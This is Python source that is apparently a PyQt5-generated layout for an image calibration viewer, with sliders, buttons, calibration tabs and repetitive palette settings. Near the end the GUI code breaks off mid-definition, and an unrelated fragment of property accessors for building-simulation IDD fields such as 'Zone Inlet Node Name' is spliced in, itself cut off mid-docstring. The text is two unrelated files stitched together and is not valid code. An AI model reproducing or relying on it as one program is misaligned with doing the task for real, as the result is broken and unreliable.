self.splitter_2.setObjectName("splitter_2")
self.splitter = QtWidgets.QSplitter(self.splitter_2)
self.splitter.setOrientation(QtCore.Qt.Horizontal)
self.splitter.setObjectName("splitter")
self.layoutWidget = QtWidgets.QWidget(self.splitter)
self.layoutWidget.setObjectName("layoutWidget")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.layoutWidget)
self.verticalLayout_2.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.pyqtgraph_widget = QtWidgets.QWidget(self.layoutWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.pyqtgraph_widget.sizePolicy().hasHeightForWidth())
self.pyqtgraph_widget.setSizePolicy(sizePolicy)
self.pyqtgraph_widget.setObjectName("pyqtgraph_widget")
self.horizontalLayout_2.addWidget(self.pyqtgraph_widget)
self.verticalLayout_2.addLayout(self.horizontalLayout_2)
self.horizontalLayout_3 = QtWidgets.QHBoxLayout()
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
self.previous_image_button = QtWidgets.QPushButton(self.layoutWidget)
self.previous_image_button.setEnabled(False)
self.previous_image_button.setObjectName("previous_image_button")
self.horizontalLayout_3.addWidget(self.previous_image_button)
self.file_slider = QtWidgets.QSlider(self.layoutWidget)
self.file_slider.setLayoutDirection(QtCore.Qt.LeftToRight)
self.file_slider.setOrientation(QtCore.Qt.Horizontal)
self.file_slider.setTickPosition(QtWidgets.QSlider.TicksAbove)
self.file_slider.setObjectName("file_slider")
self.horizontalLayout_3.addWidget(self.file_slider)
self.image_slider_value = QtWidgets.QLabel(self.layoutWidget)
self.image_slider_value.setMinimumSize(QtCore.QSize(30, 0))
self.image_slider_value.setMaximumSize(QtCore.QSize(30, 16777215))
self.image_slider_value.setBaseSize(QtCore.QSize(50, 0))
self.image_slider_value.setObjectName("image_slider_value")
self.horizontalLayout_3.addWidget(self.image_slider_value)
self.next_image_button = QtWidgets.QPushButton(self.layoutWidget)
self.next_image_button.setObjectName("next_image_button")
self.horizontalLayout_3.addWidget(self.next_image_button)
self.verticalLayout_2.addLayout(self.horizontalLayout_3)
self.toolBox = QtWidgets.QToolBox(self.splitter)
self.toolBox.setObjectName("toolBox")
self.page = QtWidgets.QWidget()
self.page.setGeometry(QtCore.QRect(0, 0, 590, 646))
self.page.setObjectName("page")
self.verticalLayout_11 = QtWidgets.QVBoxLayout(self.page)
self.verticalLayout_11.setObjectName("verticalLayout_11")
self.tabWidget_2 = QtWidgets.QTabWidget(self.page)
self.tabWidget_2.setObjectName("tabWidget_2")
self.tab_3 = QtWidgets.QWidget()
self.tab_3.setObjectName("tab_3")
self.verticalLayout_5 = QtWidgets.QVBoxLayout(self.tab_3)
self.verticalLayout_5.setObjectName("verticalLayout_5")
self.horizontalLayout_12 = QtWidgets.QHBoxLayout()
self.horizontalLayout_12.setObjectName("horizontalLayout_12")
self.use_calibration1_checkbox = QtWidgets.QCheckBox(self.tab_3)
self.use_calibration1_checkbox.setChecked(True)
self.use_calibration1_checkbox.setObjectName("use_calibration1_checkbox")
self.horizontalLayout_12.addWidget(self.use_calibration1_checkbox)
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_12.addItem(spacerItem)
self.verticalLayout_5.addLayout(self.horizontalLayout_12)
self.gridLayout = QtWidgets.QGridLayout()
self.gridLayout.setObjectName("gridLayout")
self.calibration1_x0_label = QtWidgets.QLabel(self.tab_3)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(26, 30, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(26, 30, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(69, 69, 69))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(106, 104, 100))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
self.calibration1_x0_label.setPalette(palette)
self.calibration1_x0_label.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.calibration1_x0_label.setObjectName("calibration1_x0_label")
self.gridLayout.addWidget(self.calibration1_x0_label, 0, 0, 1, 1)
self.calibration1_x0 = QtWidgets.QLineEdit(self.tab_3)
self.calibration1_x0.setMaximumSize(QtCore.QSize(50, 16777215))
self.calibration1_x0.setBaseSize(QtCore.QSize(0, 0))
self.calibration1_x0.setObjectName("calibration1_x0")
self.gridLayout.addWidget(self.calibration1_x0, 0, 1, 1, 1)
self.calibration1_width_label = QtWidgets.QLabel(self.tab_3)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(69, 69, 69))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(106, 104, 100))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
self.calibration1_width_label.setPalette(palette)
self.calibration1_width_label.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.calibration1_width_label.setObjectName("calibration1_width_label")
self.gridLayout.addWidget(self.calibration1_width_label, 0, 2, 1, 1)
self.calibration1_width = QtWidgets.QLineEdit(self.tab_3)
self.calibration1_width.setMaximumSize(QtCore.QSize(50, 16777215))
self.calibration1_width.setObjectName("calibration1_width")
self.gridLayout.addWidget(self.calibration1_width, 0, 3, 1, 1)
self.calibration1_value_label = QtWidgets.QLabel(self.tab_3)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(69, 69, 69))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(106, 104, 100))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
self.calibration1_value_label.setPalette(palette)
self.calibration1_value_label.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.calibration1_value_label.setObjectName("calibration1_value_label")
self.gridLayout.addWidget(self.calibration1_value_label, 0, 4, 1, 1)
self.calibration1_value = QtWidgets.QLineEdit(self.tab_3)
self.calibration1_value.setMaximumSize(QtCore.QSize(50, 16777215))
self.calibration1_value.setObjectName("calibration1_value")
self.gridLayout.addWidget(self.calibration1_value, 0, 5, 1, 1)
self.calibration1_y0_label = QtWidgets.QLabel(self.tab_3)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(69, 69, 69))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(106, 104, 100))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
self.calibration1_y0_label.setPalette(palette)
self.calibration1_y0_label.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.calibration1_y0_label.setObjectName("calibration1_y0_label")
self.gridLayout.addWidget(self.calibration1_y0_label, 1, 0, 1, 1)
self.calibration1_y0 = QtWidgets.QLineEdit(self.tab_3)
self.calibration1_y0.setMaximumSize(QtCore.QSize(50, 16777215))
self.calibration1_y0.setObjectName("calibration1_y0")
self.gridLayout.addWidget(self.calibration1_y0, 1, 1, 1, 1)
self.calibration1_height_label = QtWidgets.QLabel(self.tab_3)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(69, 69, 69))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(106, 104, 100))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
self.calibration1_height_label.setPalette(palette)
self.calibration1_height_label.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.calibration1_height_label.setObjectName("calibration1_height_label")
self.gridLayout.addWidget(self.calibration1_height_label, 1, 2, 1, 1)
self.calibration1_height = QtWidgets.QLineEdit(self.tab_3)
self.calibration1_height.setMaximumSize(QtCore.QSize(50, 16777215))
self.calibration1_height.setObjectName("calibration1_height")
self.gridLayout.addWidget(self.calibration1_height, 1, 3, 1, 1)
self.verticalLayout_5.addLayout(self.gridLayout)
self.calibration1_groupbox = QtWidgets.QGroupBox(self.tab_3)
self.calibration1_groupbox.setObjectName("calibration1_groupbox")
self.verticalLayout = QtWidgets.QVBoxLayout(self.calibration1_groupbox)
self.verticalLayout.setObjectName("verticalLayout")
self.horizontalLayout_4 = QtWidgets.QHBoxLayout()
self.horizontalLayout_4.setObjectName("horizontalLayout_4")
self.label_38 = QtWidgets.QLabel(self.calibration1_groupbox)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(69, 69, 69))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(106, 104, 100))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
self.label_38.setPalette(palette)
self.label_38.setObjectName("label_38")
self.horizontalLayout_4.addWidget(self.label_38)
self.calibration1_index = QtWidgets.QLabel(self.calibration1_groupbox)
self.calibration1_index.setMinimumSize(QtCore.QSize(50, 0))
self.calibration1_index.setMaximumSize(QtCore.QSize(20, 1666))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(69, 69, 69))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(106, 104, 100))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
self.calibration1_index.setPalette(palette)
self.calibration1_index.setObjectName("calibration1_index")
self.horizontalLayout_4.addWidget(self.calibration1_index)
self.calibration1_display_this_file_button = QtWidgets.QPushButton(self.calibration1_groupbox)
self.calibration1_display_this_file_button.setMinimumSize(QtCore.QSize(0, 40))
self.calibration1_display_this_file_button.setMaximumSize(QtCore.QSize(16777215, 40))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(26, 30, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(26, 30, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(69, 69, 69))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(106, 104, 100))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
self.calibration1_display_this_file_button.setPalette(palette)
self.calibration1_display_this_file_button.setObjectName("calibration1_display_this_file_button")
self.horizontalLayout_4.addWidget(self.calibration1_display_this_file_button)
self.verticalLayout.addLayout(self.horizontalLayout_4)
self.label_2 = QtWidgets.QLabel(self.calibration1_groupbox)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(69, 69, 69))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(106, 104, 100))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
self.label_2.setPalette(palette)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_2.setFont(font)
self.label_2.setStatusTip("")
self.label_2.setAlignment(QtCore.Qt.AlignCenter)
self.label_2.setObjectName("label_2")
self.verticalLayout.addWidget(self.label_2)
self.calibration1_use_current_file_button = QtWidgets.QPushButton(self.calibration1_groupbox)
self.calibration1_use_current_file_button.setMinimumSize(QtCore.QSize(0, 40))
self.calibration1_use_current_file_button.setMaximumSize(QtCore.QSize(16777215, 40))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(26, 30, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(26, 30, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(69, 69, 69))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(106, 104, 100))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
self.calibration1_use_current_file_button.setPalette(palette)
self.calibration1_use_current_file_button.setObjectName("calibration1_use_current_file_button")
self.verticalLayout.addWidget(self.calibration1_use_current_file_button)
spacerItem1 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.verticalLayout.addItem(spacerItem1)
self.verticalLayout_5.addWidget(self.calibration1_groupbox)
self.tabWidget_2.addTab(self.tab_3, "")
self.tab_4 = QtWidgets.QWidget()
self.tab_4.setObjectName("tab_4")
self.verticalLayout_6 = QtWidgets.QVBoxLayout(self.tab_4)
self.verticalLayout_6.setObjectName("verticalLayout_6")
self.horizontalLayout_13 = QtWidgets.QHBoxLayout()
self.horizontalLayout_13.setObjectName("horizontalLayout_13")
self.use_calibration2_checkbox = QtWidgets.QCheckBox(self.tab_4)
self.use_calibration2_checkbox.setChecked(True)
self.use_calibration2_checkbox.setObjectName("use_calibration2_checkbox")
self.horizontalLayout_13.addWidget(self.use_calibration2_checkbox)
spacerItem2 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_13.addItem(spacerItem2)
self.verticalLayout_6.addLayout(self.horizontalLayout_13)
self.gridLayout_2 = QtWidgets.QGridLayout()
self.gridLayout_2.setObjectName("gridLayout_2")
self.calibration2_x0_label = QtWidgets.QLabel(self.tab_4)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(193, 22, 45))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(193, 22, 45))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(106, 104, 100))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
self.calibration2_x0_label.setPalette(palette)
self.calibration2_x0_label.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.calibration2_x0_label.setObjectName("calibration2_x0_label")
self.gridLayout_2.addWidget(self.calibration2_x0_label, 0, 0, 1, 1)
self.calibration2_x0 = QtWidgets.QLineEdit(self.tab_4)
self.calibration2_x0.setMaximumSize(QtCore.QSize(50, 16777215))
self.calibration2_x0.setBaseSize(QtCore.QSize(0, 0))
self.calibration2_x0.setObjectName("calibration2_x0")
self.gridLayout_2.addWidget(self.calibration2_x0, 0, 1, 1, 1)
self.calibration2_width_label = QtWidgets.QLabel(self.tab_4)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(193, 22, 45))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(193, 22, 45))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(106, 104, 100))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
self.calibration2_width_label.setPalette(palette)
self.calibration2_width_label.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.calibration2_width_label.setObjectName("calibration2_width_label")
self.gridLayout_2.addWidget(self.calibration2_width_label, 0, 2, 1, 1)
self.calibration2_width = QtWidgets.QLineEdit(self.tab_4)
self.calibration2_width.setMaximumSize(QtCore.QSize(50, 16777215))
self.calibration2_width.setObjectName("calibration2_width")
self.gridLayout_2.addWidget(self.calibration2_width, 0, 3, 1, 1)
self.calibration2_value_label = QtWidgets.QLabel(self.tab_4)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(193, 22, 45))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(193, 22, 45))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(106, 104, 100))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
self.calibration2_value_label.setPalette(palette)
self.calibration2_value_label.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.calibration2_value_label.setObjectName("calibration2_value_label")
self.gridLayout_2.addWidget(self.calibration2_value_label, 0, 4, 1, 1)
self.calibration2_value = QtWidgets.QLineEdit(self.tab_4)
self.calibration2_value.setMaximumSize(QtCore.QSize(50, 16777215))
self.calibration2_value.setObjectName("calibration2_value")
self.gridLayout_2.addWidget(self.calibration2_value, 0, 5, 1, 1)
self.calibration2_y0_label = QtWidgets.QLabel(self.tab_4)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(193, 22, 45))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(193, 22, 45))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(106, 104, 100))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
self.calibration2_y0_label.setPalette(palette)
self.calibration2_y0_label.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.calibration2_y0_label.setObjectName("calibration2_y0_label")
self.gridLayout_2.addWidget(self.calibration2_y0_label, 1, 0, 1, 1)
self.calibration2_y0 = QtWidgets.QLineEdit(self.tab_4)
self.calibration2_y0.setMaximumSize(QtCore.QSize(50, 16777215))
self.calibration2_y0.setObjectName("calibration2_y0")
self.gridLayout_2.addWidget(self.calibration2_y0, 1, 1, 1, 1)
self.calibration2_height_label = QtWidgets.QLabel(self.tab_4)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(193, 22, 45))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(193, 22, 45))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(106, 104, 100))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
self.calibration2_height_label.setPalette(palette)
self.calibration2_height_label.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.calibration2_height_label.setObjectName("calibration2_height_label")
self.gridLayout_2.addWidget(self.calibration2_height_label, 1, 2, 1, 1)
self.calibration2_height = QtWidgets.QLineEdit(self.tab_4)
self.calibration2_height.setMaximumSize(QtCore.QSize(50, 16777215))
self.calibration2_height.setObjectName("calibration2_height")
self.gridLayout_2.addWidget(self.calibration2_height, 1, 3, 1, 1)
self.verticalLayout_6.addLayout(self.gridLayout_2)
self.calibration2_groupbox = QtWidgets.QGroupBox(self.tab_4)
self.calibration2_groupbox.setObjectName("calibration2_groupbox")
self.verticalLayout_9 = QtWidgets.QVBoxLayout(self.calibration2_groupbox)
self.verticalLayout_9.setObjectName("verticalLayout_9")
self.horizontalLayout_5 = QtWidgets.QHBoxLayout()
self.horizontalLayout_5.setObjectName("horizontalLayout_5")
self.label_45 = QtWidgets.QLabel(self.calibration2_groupbox)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(193, 22, 45))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(193, 22, 45))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(106, 104, 100))
| |
if `value` is not a valid value
Returns:
str: the value of `zone_inlet_node_name` or None if not set
"""
return self["Zone Inlet Node Name"]
@zone_inlet_node_name.setter
def zone_inlet_node_name(self, value=None):
"""Corresponds to IDD field `Zone Inlet Node Name`"""
self["Zone Inlet Node Name"] = value
@property
def setpoint_node_or_nodelist_name(self):
"""field `Setpoint Node or NodeList Name`
| Node(s) at which the temperature will be set
Args:
value (str): value for IDD Field `Setpoint Node or NodeList Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
